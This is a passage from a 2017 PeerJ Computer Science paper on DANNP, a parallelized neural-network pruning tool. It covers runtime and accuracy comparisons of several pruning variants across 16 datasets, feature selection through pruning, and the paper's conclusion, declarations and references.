enhancements in the running time are noticeable for WDBC and PP datasets containing Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 9/22 https://peerj.com https://doi.org/10.7717/peerjcs.137/fig-2 http://dx.doi.org/10.7717/peerj-cs.137#supp-3 http://dx.doi.org/10.7717/peerj-cs.137#supp-3 http://dx.doi.org/10.7717/peerj-cs.137 Table 3 Execution time comparison between the pruning variants and NNSYSID MATLAB toolbox. Execution time is measured in minutes. These comparison results should be taken cautiously since the DANNP and NNSYSID are written in different languages and run under different environments. Dataset OBS-parallel MWOBS-parallel UOBS-parallel MP NNSYSID No. of weights BC 0.0015 0.0014 0.0015 0.0008 0.509 111 HD 0.0024 0.0022 0.0011 0.0006 0.532 151 WDBC 0.0041 0.0025 0.0049 0.0014 4.682 321 PP 0.0130 0.0084 0.0454 0.0001 4.256 591 CA 0.3186 0.2632 3.1448 0.0049 >24 h 2,791 SM 6.3967 2.1337 69.5910 0.0332 >24 h 5,021 PC 763.596 424.894 >24 h 0.0181 >24 h 21,371 TFTF 25.6599 12.5185 213.0404 0.0174 >24 h 10,641 AID 17.6707 11.6155 61.1201 0.3885 >24 h 9,201 ULC 0.7904 0.1643 2.1006 0.0015 91.583 1,579 SDD 3.8972 1.5572 1.7080 0.2247 >24 h 611 MD 98.4303 10.9182 179.1087 2.1471 >24 h 7,960 HAR 44.4636 5.0967 312.4713 0.2015 >24 h 5,686 ESR 1.4119 0.5829 0.5537 0.0871 >24 h 1,801 LSVT 1.7044 0.7471 6.2507 0.0004 >24 h 3,121 DCC 0.1215 0.1185 0.0476 0.0238 90.161 261 samples described by 30 and 57 input features, respectively. For instance, in an ANN model with 60 nodes in the hidden layer for PP dataset (containing 3,540 weights, from Eq. (3)), the OBS-parallel algorithm runs ∼5.3 times faster than the serial OBS implementation. The main advantage of MWOBS-parallel algorithms is that it requires fewer evaluations of the H-inverse and when coupled with a parallel approximation of the H-inverse, more speedup is achieved. Furthermore, we compared the performance of the pruning variants implemented in DANNP against the OBS implementation in NNSYSID MATLAB toolbox (Norgaard, Ravn & Poulsen, 2002). The NNSYSID is a toolbox for the identification of nonlinear dynamic systems with ANNs, often used as a benchmark, which implements several algorithms for ANN training and pruning. The fair comparison between the DANNP and NNSYSID tools is not possible since NNSYSID runs under MATLAB R2017b environment. Still, to get an insight about how much time is needed for the same tasks with these two tools, the NNSYSID and the pruning variants implemented in DANNP were run under the same conditions. These include the same data partitioning, activation functions, hidden units, training algorithms, and tolerance level. Data were partitioned into 15% testing, 15% validation, and 70% training. Table 3 shows the execution time comparison between DANNP and NNSYSID toolbox. For datasets with more features and samples, NNSYSID fails to scale for datasets with a larger number of features. These results show the running time improvement obtained by our implementation to approximate the H-inverse. So far, we have only analyzed the running time of the implemented ANN pruning algorithms. Next, we discuss in details the effects of the pruning algorithms in the ANN training error, cross-validation performance and on the FS resulting from the pruning. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 10/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137 Effects of different pruning algorithms on the ANN training error Apart from the running time, the main difference in the ANN pruning algorithms is the selection of the weights to be removed during a pruning iteration. To investigate the effects of the different ANN pruning algorithms on the network, we evaluated the training performance through pruning steps until all weights are removed. The aim is to derive the simplest ANN structure (smaller number of weights) without increasing the MSE on the training data. Figures 3A–3J and Fig. S1 show the effects of the different pruning algorithms on the MSE. From these results, we observed that different pruning algorithms (including MP) were able to retain very few network weights without increasing the MSE for some datasets (i.e., PC and PP). However, the MP algorithm produced the highest MSE compared to the other algorithms for the remaining datasets. This is because the MP algorithm does not account for the effects of the removed weights on the network error (as mentioned in the ‘Introduction’) and thus, tends to remove the incorrect weights, which may significantly increase the error. Conversely, MWOBS-parallel consistently achieved the minimum increase in the MSE compared to the other pruning algorithms in all of the considered datasets. The application of OBS-parallel and UOBS-parallel algorithms is computationally prohibitive for ANNs with a large number of weights (i.e., for datasets with a higher number of input features or ANN with a larger number of nodes in the hidden layer). As such, Figs. 3A–3E show the error curves for all pruning algorithms for smaller datasets (BC, HD, WDBC, PP, and CA) and Figs. 3F–3J and Fig. S1 show the error curves only for MP and MWOBS-parallel algorithms for the remaining 11 datasets (PC, ESR, LSVT, ULC, HAR, SM, TFTF, AID, DCC, SDD, and MD). From these results, we can generally conclude that in order to achieve the greatest reduction of the number of weights, while maintaining the lowest MSE for ANN during the training, the MWOBS-parallel appears to consistently perform better than the other algorithms while being able to cope with more complex ANN structures and datasets. Estimates of model performance and pruning tradeoff Less complex models are preferred over more complex as this may avoid overfitting the training data, helps increasing model interpretability, and helps reducing computation operations. In ANN specifically, we analyze the effects of ANN pruning on the cross- validation performance (see the Methods section). Figure 4 shows the GM in the cross- validation and the number of weights in the pruned ANNs. Notably, the pruning advantages may be seen in PC dataset, which originally requires a very complex ANN structure as the samples are described by 2,135 input features. For PC dataset, the resulting ANN from the MWOBS-parallel retained ∼400 weights as opposed to 42,740 weights in the unpruned ANN (a reduction of 99% of the weights) with an improvement of 0.65% in the GM. Similarly, for PP and HAR datasets, we observe that MWOBS-parallel reduced the number of weights by ∼95%, while achieving an improved performance with a GM of 78.85%, compared to 76.69% achieved by the unpruned ANN for PP dataset, and 97.68% compared to 97.13% for HAR. The MWOBS-parallel achieved similar results compared to the unpruned ANN but it was able to reduce the number of weights by ∼95%, ∼88%, ∼85%,∼70%, 13%, 12%, and 8% for WDBC, ESR, BC, MD, SM, AID, and DCC datasets, Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 11/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137#supp-5 http://dx.doi.org/10.7717/peerj-cs.137#supp-5 http://dx.doi.org/10.7717/peerj-cs.137 Figure 3 Effects of different pruning algorithms on ANN performance on the training data. (A–E) Datasets for which all ANN pruning algorithms were completed within a given time limit. (F–J) Datasets for which only MP and MWOBS-parallel algorithms were completed within a given time limit. The x-axis represents the number of remaining weights after each pruning iteration, while the y-axis shows the train- ing MSE. Full-size DOI: 10.7717/peerjcs.137/fig-3 Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 12/22 https://peerj.com https://doi.org/10.7717/peerjcs.137/fig-3 http://dx.doi.org/10.7717/peerj-cs.137 Figure 4 Cross-validation performance and pruning trade-off. The colored bars represent the GM for each of the datasets, while the solid black line denotes the percentage of the remaining weights in the pruned ANN. The UOBS-parallel results for the PC dataset are not shown as the running time of the algo- rithm exceeded seven days. Full-size DOI: 10.7717/peerjcs.137/fig-4 respectively. Although MWOBS-parallel considerably reduced the number of weights for HD, ULC, and SDD datasets, the MP algorithm achieved better results. Finally, all pruning algorithms achieved worse performance than the unpruned ANN in TFTF dataset with a reduction of ∼2.5% in the GM. Table S2 shows the accuracy, precision, recall, F1 score, Cohen’s kappa coefficient, and the percentage of the remaining weights in the ANN for each dataset. Ideally, we would hope that the pruned ANNs consistently achieve better results than the unpruned ANN. However, the pruning effects are data dependent and may result in ANNs that, depending on the problem, show better, similar or worse performance compared to the unpruned ANNs. In this regard, the Friedman’s test indicates that there is no significant difference (p-value of 0.4663) in the GM performance between the unpruned and pruned ANNs by the different algorithms on our datasets. Nevertheless, the pruned ANNs are considerably simpler, which reduces the computation demands and increases the interpretability of the model. Moreover, the simpler models may arguably perform better for unseen samples, as the simpler models in principle generalize better because they are less likely to overfit the training data. Overall, results in Fig. 4 show that our solutions are suitable for datasets with a small to a medium number of samples described by a relatively large number of input features. This is frequently the case for many classification problems in real applications. More importantly, MWOBS-parallel can cope with complex ANN structures where other pruning algorithms require considerably longer running times. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 13/22 https://peerj.com https://doi.org/10.7717/peerjcs.137/fig-4 http://dx.doi.org/10.7717/peerj-cs.137#supp-4 http://dx.doi.org/10.7717/peerj-cs.137 ANN pruning effects on data features and comparison to feature selection methods In addition, we exploit the resulting pruned ANN for assessing and ranking the relevance of the data features. In this regard, we considered the selected features by the ANN pruning and compared their predictive accuracy with seven state-of-the-art methods for FS. Although there have been several attempts to use ANN in FS for certain applications (Becker & Plumbley, 1996; Dong & Zhou, 2008; Kaikhah & Doddameti, 2006; Setiono & Leow, 2000), there are much faster and more efficient approaches for this Guyon & Elisseeff (2003). However, we show that through ANN pruning, we can obtain more insights into the data by ranking and selecting the discriminative features, which is an additional information for users to explore for the problem at hand. As observed in Fig. 4, pruning algorithms may significantly decrease the number of weights in an ANN. With this reduction, some input features may lose their connecting weights to all nodes in the hidden layer (e.g., x2 in Fig. 1B). This may help to infer the significance of the input features in a dataset. To demonstrate this, we performed pruning for the ANNs derived from the 16 datasets until the MSE exceeded a threshold on the validation data and discarded all input features without weights to the hidden layer. We then re-trained the ANN using only the remaining features to observe how they affected the ANN training and testing performance. Table 4 shows the GM for the ANNs derived by using the original set of features and the ANNs derived using the subset of features that had at least one connecting weight to the hidden layer after the ANN pruning. Consistent with Fig. 3F, ANN pruning selected only 2% of the features (50 out of 2,135) for PC dataset while improving the GM by ∼1.6% compared to the more complex ANN derived using the original feature set. In general, eight datasets (PC, AID, SM, CA, LSVT, TFTF, HAR, and WDBC) show a considerable reduction of the input features (from 98% to 47%). The achieved GM of the ANN derived using the feature subset from pruning improved in eight datasets (SM, PC, TFTF, AID, ULC, HAR, ESR, and LSVT), remained relatively the same on four datasets (BC, WDBC, DCC, and MD), and decreased in four (HD, PP, CA, and SDD). These results suggest that some classification problems are described with a less redundant set of features, or that the FS methods were not able to discriminate well the redundant from the non-redundant set of features. As such, the negative effects of FS on the GM for HD, PP, CA and SDD datasets indicate that FS may not be useful for all datasets. This may be the case when the data samples are defined by an already small number of highly non-redundant features (as in HD dataset) or simply when the features are weakly or not correlated. Nevertheless, the Wilcoxon signed rank test indicates that ANNs using a reduced feature set perform equally well compared to the unpruned ANNs (p-value of 0.6387), while being considerably simpler and possibly more generalizable. Here, we should note that for nine datasets (WDBC, SM, PC, TFTF, AID, ULC, HAR, ESR, and LSVT) out of 16, the pruned ANNs achieved better performance than the unpruned ANNs. Although the results from Table 4 give an insight of the effects of the FS by ANN pruning, we asked how would this compare to other FS methods. For this, we performed a comprehensive analysis to investigate the ANN pruning effects on the input Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 14/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137 Table 4 Selection of the input features through the ANN pruning and the effect on performance. The ANNs were trained on 70% of the data using the selected feature set, 15% was used for validation and 15% for testing. The bolded numbers represent the highest achieved performance with pruned and/or un- pruned network. Dataset Remaining input features (%) GM (%) 100% (unpruned) 97.14 Breast cancer (BC) 78% (pruned) 97.14 100% (unpruned) 80.01 Heart disease (HD) 85% (pruned) 77.76 100% (unpruned) 87.38 Wisconsin Breast cancer (WDBC) 53% (pruned) 87.67 100% (unpruned) 70.71 Promoters prediction (PP) 70% (pruned) 57.73 100% (unpruned) 73.72 Cardiac arrhythmia (CA) 22% (pruned) 62.64 100% (unpruned) 59.30 Synthetic madelon (SM) 16% (pruned) 61.00 100% (unpruned) 92.58 Prostate cancer (PC) 2% (pruned) 94.20 100% (unpruned) 73.41 TF-TF combinations (TFTF) 30% (pruned) 78.40 100% (unpruned) 66.93 AID886 compounds (AID) 11% (pruned) 68.15 100% (unpruned) 78.19 Urban land cover (ULC) 94% (pruned) 84.17 100% (unpruned) 96.41 Sensorless drive diagnosis (SDD) 82% (pruned) 95.74 100% (unpruned) 88.49 Default credit cards (DCC) 71% (pruned) 87.67 100% (unpruned) 96.61 Human activity recognition (HAR) 42% (pruned) 97.04 100% (unpruned) 91.38 Epileptic seizure recognition (ESR) 97% (pruned) 91.92 100% (unpruned) 83.20 LSVT voice rehabilitation (LSVT) 24% (pruned) 87.70 100% (unpruned) 94.40 MNIST digits (MD) 85% (pruned) 94.28 features using MWOBS-parallel, and compared it with seven state-of-the-art methods for FS. Figures 5A–5P show the comparison of the cross-validation results obtained from a naïve Bayes classifier derived by using the different subsets of features. Interestingly, when considering 10% or more of the top ranked features, the feature subset determined by MWOBS-parallel outperformed all methods for FS in two datasets (HAR and ULC). Moreover, the feature subset obtained through MWOBS-parallel consistently achieved comparable performance in the remaining datasets compared to the other methods for FS, Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 15/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137 Figure 5 Performance comparison between the methods for FS and MWOBS-parallel. (A–P) Cross- validation accuracy results (see the Methods section) obtained from a naïve Bayes classifier derived by us- ing different feature subsets. Full-size DOI: 10.7717/peerjcs.137/fig-5 Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 16/22 https://peerj.com https://doi.org/10.7717/peerjcs.137/fig-5 http://dx.doi.org/10.7717/peerj-cs.137 with WDBC, PP, and MD being the exceptions. Given that many FS methods are heuristics when solving the combinatorial problem of FS, the results obtained by these methods and ANN pruning depends on the dataset and therefore, a specific method may be better than the others for a particular dataset. However, results in Fig. 5 demonstrate that ANN pruning is not only useful for reducing the complexity of the model, but also to get new insights about the data by being able to select and rank the relevant features. We point out that FS through the ANN pruning is a side benefit of the pruning process. CONCLUSION The simplification of ANN structures through pruning is of great importance in reducing the overfitting during the training and in deriving more robust models. Although several ANN pruning algorithms have been proposed, these algorithms are unable to cope with more complex ANN structures in an acceptable amount of time if the performance of the pruned network has to be preserved. The OBS algorithm is among the most accurate pruning algorithms for ANNs. Overall, the main bottleneck of ANN pruning algorithms based on OBS is the computation of the H-inverse for the pruning of each weight. To address this problem, we implemented DANNP, an efficient tool for ANN pruning that implements a parallelized version of the algorithm for faster a calculation of the approximation of the H-inverse. The DANNP tool provides four ANN pruning algorithms, namely, OBS-parallel, UOBS-parallel, MWOBS-parallel, and MP. We considered 16 datasets from different application domains and showed that mitigation of overfitting using ANN pruning might lead to comparable or even better accuracy compared to fully connected ANNs. Although we have tested our tool on a set of selected datasets, we believe that it is able to cope with problems from different domains and is suitable for small to medium size data regarding the number of features and data instances. We assessed the running times and performance of the implemented pruning algorithms. Our OBS-parallel algorithm was able to speed up the ANN pruning by up to eight times compared to the serial implementation of the OBS algorithm in a 32-core machine. Moreover, we show that MWOBS-parallel produces competitive results to other pruning algorithms while considerably reducing the running time. Regarding the effects of pruning on the performance, in eight out of the 16 datasets, the pruned ANNs result in a significant reduction in the number of weights by 70% –99% compared to those of the unpruned ANNs. Although results show that the effects of the ANN pruning depend on the dataset, the pruned ANN models maintained comparable or better model accuracy. Finally, we show that through ANN pruning, input features may lose all outgoing weights to the hidden layer, resulting in the selection of features more relevant for the problem in question. We evaluated the selected features from ANN pruning and demonstrated that this set is comparable in its discriminative capabilities as the feature sets obtained by the seven considered state-of-the-art methods for FS. Although FS methods may be used to rank the features based on different statistical measures, we ranked the remaining features considering the sum of the absolute values of their associated network weights. Therefore, the selection of relevant features and the ranking resulting Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 17/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137 from the ANN pruning provides the user with more information about the classification problem at hand. The DANNP tool can cope with complex and medium size datasets. ACKNOWLEDGEMENTS We would like to thank John Hanks for his suggestions during the implementation of the DANNP tool and Robert Hoehndorf for discussions on the manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by King Abdullah University of Science and Technology (KAUST) through the baseline fund BAS/1/1606-01-01 for Vladimir B. Bajic. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: King Abdullah University of Science and Technology (KAUST): BAS/1/1606-01-01. Competing Interests Vladimir B. Bajic is an Academic Editor for PeerJ. Author Contributions • Mona Alshahrani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper, development of the online tool. • Othman Soufan conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper, development of the online tool. • Arturo Magana-Mora performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, development of the online tool. • Vladimir B. Bajic conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The Computational Bioscience Research Center, KAUST data is available as a Supplemental File, and other raw data is at Zenodo: https://zenodo.org/record/1001086. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.137#supplemental-information. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 18/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.137#supplemental-information https://zenodo.org/record/1001086 http://dx.doi.org/10.7717/peerj-cs.137#supplemental-information http://dx.doi.org/10.7717/peerj-cs.137#supplemental-information http://dx.doi.org/10.7717/peerj-cs.137 REFERENCES Almeida JS. 2002. Predictive non-linear modeling of complex data by artificial neural networks. Current Opinion in Biotechnology 13(1):72–76 DOI 10.1016/S0958-1669(02)00288-4. Amdahl GM. 1967. Validity of the single processor approach to achieving large scale computing capabilities. AFIPS Conference Proceedings 30:483–485 DOI 10.1145/1465482.1465560. Anguita D, Ghio A, Oneto L, Parra X, Reyes-Ortiz JL. 2013. A public domain dataset for human activity recognition using smartphones. In: 21th European symposium on artificial neural networks, computational intelligence and machine learning, ESANN, Bruges, Belgium. Ashoor H, Magana-Mora A, Jankovic BR, Kamau A, Awara K, Chowdary R, Archer JAC, Bajic VB. 2011. Recognition of translation initiation sites in arabidopsis Thaliana. In: Lecca P, Tulpan D, Rajaraman K, eds. Systemic approaches in bioin- formatics and computational systems biology: recent advances. Hershey, PA: IGI Publishing, 105–116. Bajic VB, Seah SH, Chong A, Zhang G, Koh JL, Brusic V. 2002. Dragon promoter finder: recognition of vertebrate RNA polymerase II promoters. Bioinformatics 18(1):198–199 DOI 10.1093/bioinformatics/18.1.198. Bajic VB, Tan SL, Suzuki Y, Sugano S. 2004. Promoter prediction analysis on the whole human genome. Nature Biotechnology 22:1467–1473 DOI 10.1038/nbt1032. Bajic VB, Werner T. 2005. Promoter prediction. In: Encyclopedia of genetics, genomics, proteomics and bioinformatics, part 4 bioinformatics, 4.2. Gene finding and gene structure. Vol. 7. New York: John Wiley & Sons, Ltd., 2881–2886. Basheer IA, Hajmeer M. 2000. Artificial neural networks: fundamentals, comput- ing, design, and application. Journal of Microbiological Methods 43(1):3–31 DOI 10.1016/S0167-7012(00)00201-3. Becker S, Plumbley M. 1996. Unsupervised neural network learning procedures for feature extraction and classification. Applied Intelligence 6(3):185–203 DOI 10.1007/BF00126625. Bishop CM. 2006. Pattern recognition and machine learning. Vol. 4. New York: Springer- Verlag. Blackford LS, Demmel J, Dongarra J, Duff I, Hammarling S, Henry G, Heroux M, Kaufman L, Lumsdaine A, Petitet A, Pozo R, Remington K, Whaley RC. 2002. An updated set of basic linear algebra subprograms (BLAS). ACM Transactions on Mathematical Software 28(2):135–151 DOI 10.1145/567806.567807. Brown G, Pocock A, Zhao M-J, Luján M. 2012. Conditional likelihood maximisation: a unifying framework for information theoretic feature selection. The Journal of Machine Learning Research 13(1):27–66. Burden F, Winkler D. 2009. Bayesian regularization of neural networks. Artificial Neural Networks: Methods and Applications 458:23–42. Cybenko G. 1989. Approximation by superpositions of a sigmoidal function. Mathemat- ics of Control, Signals and Systems 2:303–314 DOI 10.1007/BF02551274. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 19/22 https://peerj.com http://dx.doi.org/10.1016/S0958-1669(02)00288-4 http://dx.doi.org/10.1145/1465482.1465560 http://dx.doi.org/10.1093/bioinformatics/18.1.198 http://dx.doi.org/10.1038/nbt1032 http://dx.doi.org/10.1016/S0167-7012(00)00201-3 http://dx.doi.org/10.1007/BF00126625 http://dx.doi.org/10.1145/567806.567807 http://dx.doi.org/10.1007/BF02551274 http://dx.doi.org/10.7717/peerj-cs.137 Dias FM, Antunes A, Mota AM. 2004. Artificial neural networks: a review of com- mercial hardware. Engineering Applications of Artificial Intelligence 17(8):945–952 DOI 10.1016/j.engappai.2004.08.011. Dong M, Zhou X-S. 2008. Knowledge discovery in corporate events by neural network rule extraction. Applied Intelligence 29(2):129–137 DOI 10.1007/s10489-007-0053-3. Fernandez-Delgado M, Cernadas E, Barro S. 2014. Do we need hundreds of classifiers to solve real world classification problems? Journal of Machine Learning Research 15(1):3133–3781. Fleuret F. 2004. Fast binary feature selection with conditional mutual information. The Journal of Machine Learning Research 5:1531–1555. Gan R, Chen N, Huang D. 2016. Comparisons of forecasting for hepatitis in Guangxi Province, China by using three neural networks models. PeerJ 4:e2684 DOI 10.7717/peerj.2684. Gardnera MW, Dorlinga SR. 1998. Artificial neural networks (the multilayer perceptron)—a review of applications in the atmospheric sciences. Atmospheric Environment 32(14–15):2627–2636 DOI 10.1016/S1352-2310(97)00447-0. Guyon I, Elisseeff A. 2003. An introduction to variable and feature selection. The Journal of Machine Learning Research 3:1157–1182. Hall MA. 1999. Correlation-based feature selection for machine learning. Hamilton: The University of Waikato. Hassibi B, Stork DG, Wolff GJ. 1993. Optimal brain surgeon and general network pruning. In: IEEE international conference on neural networks, 1993, San Francisco, CA, USA. DOI 10.1109/ICNN.1993.298572. Hatzigeorgiou A. 2002. Translation initiation start prediction in human cDNAs with high accuracy. Bioinformatics 18(2):343–350. Hernández-Serna A, Jiménez-Segura F. 2014. Automatic identification of species with neural networks. PeerJ 2:e563 DOI 10.7717/peerj.563. Hornik K, Stinchcombe M, White H. 1989. Multilayer feedforward networks are universal approximators. Neural Networks 2(5):359–366 DOI 10.1016/0893-6080(89)90020-8. Jayne C, Iliadis L, Mladenov V. 2016. Special issue on the engineering applica- tions of neural networks. Neural Computing and Applications 27(5):1075–1076 DOI 10.1007/s00521-016-2318-4. Johnson B, Xie Z. 2013. Classifying a high resolution image of an urban area using super- object information. ISPRS Journal of Photogrammetry and Remote Sensing 83:40–49 DOI 10.1016/j.isprsjprs.2013.05.008. Kaikhah K, Doddameti S. 2006. Discovering trends in large datasets using neural networks. Applied Intelligence 24(1):51–60 DOI 10.1007/s10489-006-6929-9. Kalkatawi M, Rangkuti F, Schramm M, Jankovic BR, Kamau A, Chowdary R, Archer JA, Bajic V. 2013. Dragon PolyA spotter: predictor of poly(A) motifs within human genomic DNA sequences [Abstract 1484]. Bioinformatics 29(11) DOI 10.1093/bioinformatics/btt161. Karnin ED. 1990. A simple procedure for pruning back-propagation trained neural net- works. Neural Networks, IEEE Transactions on 1(2):239–242 DOI 10.1109/72.80236. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 20/22 https://peerj.com http://dx.doi.org/10.1016/j.engappai.2004.08.011 http://dx.doi.org/10.1007/s10489-007-0053-3 http://dx.doi.org/10.7717/peerj.2684 http://dx.doi.org/10.1016/S1352-2310(97)00447-0 http://dx.doi.org/10.1109/ICNN.1993.298572 http://dx.doi.org/10.7717/peerj.563 http://dx.doi.org/10.1016/0893-6080(89)90020-8 http://dx.doi.org/10.1007/s00521-016-2318-4 http://dx.doi.org/10.1016/j.isprsjprs.2013.05.008 http://dx.doi.org/10.1007/s10489-006-6929-9 http://dx.doi.org/10.1093/bioinformatics/btt161 http://dx.doi.org/10.1109/72.80236 http://dx.doi.org/10.7717/peerj-cs.137 Kira K, Rendell LA. 1992. The feature selection problem: traditional methods and a new algorithm. In: AAAI ’92 Proceedings of the tenth national conference on Artificial intelligence, San Jose, California—July 12–16, 1992. Klima G. 2015. A new approach towards implementing artificial neural networks. LeCun Y, Denker JS, Solla SA, Howard RE, Jackel LD. 1989. Optimal brain damage. In: Paper presented at the NIPs. Li Z, Li Y, Sun L, Tang Y, Liu L, Zhu W. 2015. Artificial neural network cascade identifies multi-P450 inhibitors in natural compounds. PeerJ 3:e1524 DOI 10.7717/peerj.1524. Lichman M. 2013. UCI machine learning repository. Available at http://archive.ics.uci. edu/ml/index.php. Magana-Mora A, Ashoor H, Jankovic BR, Kamau A, Awara K, Chowdary R, Archer JAC, Bajic VB. 2013. Dragon TIS Spotter: an Arabidopsis-derived pre- dictor of translation initiation sites in plants. Bioinformatics 29(1):117–118 DOI 10.1093/bioinformatics/bts638. Magana-Mora A, Bajic VB. 2017. OmniGA: optimized omnivariate decision trees for generalizable classification models. Scientific Reports 7:Article 3898 DOI 10.1038/s41598-017-04281-9. Magana-Mora A, Kalkatawi M, Bajic VB. 2017. Omni-PolyA: a method and tool for accurate recognition of Poly(A) signals in human genomic DNA. BMC Genomics 18(1):Article 620 DOI 10.1186/s12864-017-4033-7. Meireles MRG, Almeida PEM, Simoes MG. 2003. A comprehensive review for industrial applicability of artificial neural networks. IEEE Transactions on Industrial Electronics Society 50(3):585–601 DOI 10.1109/TIE.2003.812470. Mozer MC, Smolensky P. 1989. Skeletonization: a technique for trimming the fat from a network via relevance assessment. In: Advances in neural information processing systems. Ng AY. 2004. Feature selection, L 1 vs. L 2 regularization, and rotational invariance. In: ICML ’04 Proceedings of the twenty-first international conference on Machine learning, Banff, Alberta, Canada—July 04–08, 2004. Norgaard M, Ravn O, Poulsen NK. 2002. NNSYSID-toolbox for system identification with neural networks. Mathematical and Computer Modelling of Dynamical Systems 8(1):1–20 DOI 10.1076/mcmd.8.1.1.8342. Nowlan SJ, Hinton GE. 1992. Simplifying neural networks by soft weight-sharing. Neural Computation 4(4):473–493 DOI 10.1162/neco.1992.4.4.473. Peng H, Long F, Ding C. 2005. Feature selection based on mutual information criteria of max-dependency, max-relevance, and min-redundancy. IEEE Transactions on Pattern Analysis and Machine Intelligence 27(8):1226–1238 DOI 10.1109/TPAMI.2005.159. Prechelt L. 2012. Early stopping—but when? In: Neural networks: tricks of the trade. Lecture notes in computer science, vol. 7700. Berlin, Heidelberg: Springer, 53–67. Reed R. 1993. Pruning algorithms-a survey. IEEE Transactions on Neural Networks 4(5):740–747 DOI 10.1109/72.248452. Riedmiller M. 1994. Rprop-description and implementation details. Technical report. Karlsruhe, University of Karlsruhe. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 21/22 https://peerj.com http://dx.doi.org/10.7717/peerj.1524 http://archive.ics.uci.edu/ml/index.php http://archive.ics.uci.edu/ml/index.php http://dx.doi.org/10.1093/bioinformatics/bts638 http://dx.doi.org/10.1038/s41598-017-04281-9 http://dx.doi.org/10.1186/s12864-017-4033-7 http://dx.doi.org/10.1109/TIE.2003.812470 http://dx.doi.org/10.1076/mcmd.8.1.1.8342 http://dx.doi.org/10.1162/neco.1992.4.4.473 http://dx.doi.org/10.1109/TPAMI.2005.159 http://dx.doi.org/10.1109/72.248452 http://dx.doi.org/10.7717/peerj-cs.137 Schmeier S, Jankovic B, Bajic VB. 2011. Simplified method to predict mutual interac- tions of human transcription factors based on their primary structure. PLOS ONE 6(7):e21887 DOI 10.1371/journal.pone.0021887. Setiono R, Leow WK. 2000. FERNN: an algorithm for fast extraction of rules from neural networks. Applied Intelligence 12(1–2):15–25 DOI 10.1023/A:1008307919726. Singh D, Febbo PG, Ross K, Jackson DG, Manola J, Ladd C, Tamayo P, Renshaw AA, D’Amico AV, Richie JP. 2002. Gene expression correlates of clinical prostate cancer behavior. Cancer Cell 1(2):203–209 DOI 10.1016/S1535-6108(02)00030-2. Soufan O, Ba-Alawi W, Afeef M, Essack M, Rodionov V, Kalnis P, Bajic VB. 2015a. Mining chemical activity status from high-throughput screening assays. PLOS ONE 10(12):e0144426 DOI 10.1371/journal.pone.0144426. Soufan O, Kleftogiannis D, Kalnis P, Bajic VB. 2015b. DWFS: a wrapper feature selection tool based on a parallel genetic algorithm. PLOS ONE 10(2):e0117988 DOI 10.1371/journal.pone.0117988. Srivastava N, Hinton G, Krizhevsky A, Sutskever I, Salakhutdinov R. 2014. Dropout: a simple way to prevent neural networks from overfitting. The Journal of Machine Learning Research 15(1):1929–1958. Stahlberger A, Riedmiller M. 1997. Fast network pruning and feature extraction by using the unit-OBS algorithm. Advances in Neural Information Processing Systems 9:655–661. Tsanas A, Little MA, Fox C, Ramig LO. 2014. Objective automatic assessment of rehabil- itative speech treatment in parkinson’s disease. IEEE Transactions on Neural Systems and Rehabilitation Engineering 22(1):181–190 DOI 10.1109/TNSRE.2013.2293575. Wan L, Zeiler M, Zhang S, Cun YL, Fergus R. 2013. Regularization of neural networks using dropconnect. In: Proceedings of the 30th international conference on machine learning (ICML-13). Wang C-C, Tan K-L, Chen C-T, Keerthi SS, Mahajan D, Sundararajan S, Lin C-J. 2016. Distributed Newton methods for deep learning. Technical report. National Taiwan University. Wang Y, Song W, Wu J, Z ZL, Mu F, Li Y, Huang H, Zhu W, Zhang F. 2017. Modeling using clinical examination indicators predicts interstitial lung disease among patients with rheumatoid arthritis. PeerJ 5:e3021 DOI 10.7717/peerj.3021. Yang H, Moody J. 1999. Feature selection based on joint mutual information. In: Proceedings of international ICSC symposium on advances in intelligent data analysis. Yeh IC, Lien CH. 2009. The comparisons of data mining techniques for the predictive ac- curacy of probability of default of credit card clients. Expert Systems with Applications 36(2):2473–2480 DOI 10.1016/j.eswa.2007.12.020. Alshahrani et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.137 22/22 https://peerj.com http://dx.doi.org/10.1371/journal.pone.0021887 http://dx.doi.org/10.1023/A:1008307919726 http://dx.doi.org/10.1016/S1535-6108(02)00030-2 http://dx.doi.org/10.1371/journal.pone.0144426 http://dx.doi.org/10.1371/journal.pone.0117988 http://dx.doi.org/10.1109/TNSRE.2013.2293575 http://dx.doi.org/10.7717/peerj.3021 http://dx.doi.org/10.1016/j.eswa.2007.12.020 http://dx.doi.org/10.7717/peerj-cs.137 